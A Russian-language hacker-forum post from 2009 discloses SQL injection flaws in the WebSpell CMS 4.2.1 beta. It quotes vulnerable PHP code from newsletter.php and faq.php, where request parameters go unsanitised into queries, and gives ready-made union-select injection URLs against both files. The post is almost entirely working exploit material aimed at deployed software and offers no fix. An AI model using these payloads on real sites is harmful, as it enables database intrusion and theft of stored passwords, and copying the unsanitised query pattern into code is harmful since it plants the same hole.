02.12.2009, 00:09
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
С нами:
9223466
Репутация:
3171
|
|
Product: WebSpell
Author: http://webspell.org
Version: 4.2.1 beta
/*Тут уже публиковалось раньше под эту CMS несколько дыр,но с обновлением их убрали.Файлов много,а вот нарыл немного*/
SLQ-inj
file: newsletter.php
PHP код:
elseif($action=="delete") {
$ergebnis = safe_query("SELECT pass FROM ".PREFIX."newsletter WHERE email='".$_POST['email']."'");
...
elseif($action=="forgot") {
$ergebnis = safe_query("SELECT pass FROM ".PREFIX."newsletter WHERE email='".$_POST['email']."'");
target: ?action=delete&email=1'+union+select+1,2,3,4,5,6,7 ,8/*
file: faq.php
PHP код:
$faqcatID = $_GET['faqcatID'];
$get = safe_query("SELECT faqcatname FROM ".PREFIX."faq_categories WHERE faqcatID='".$faqcatID."'");
$dc = mysql_fetch_assoc($get);
$faqcatname = $dc['faqcatname'];
target: ?faqcatID=1'+union+select+1,2,3,4,5,6,7/*
Последний раз редактировалось m0Hze; 02.12.2009 в 00:11..
|
|
|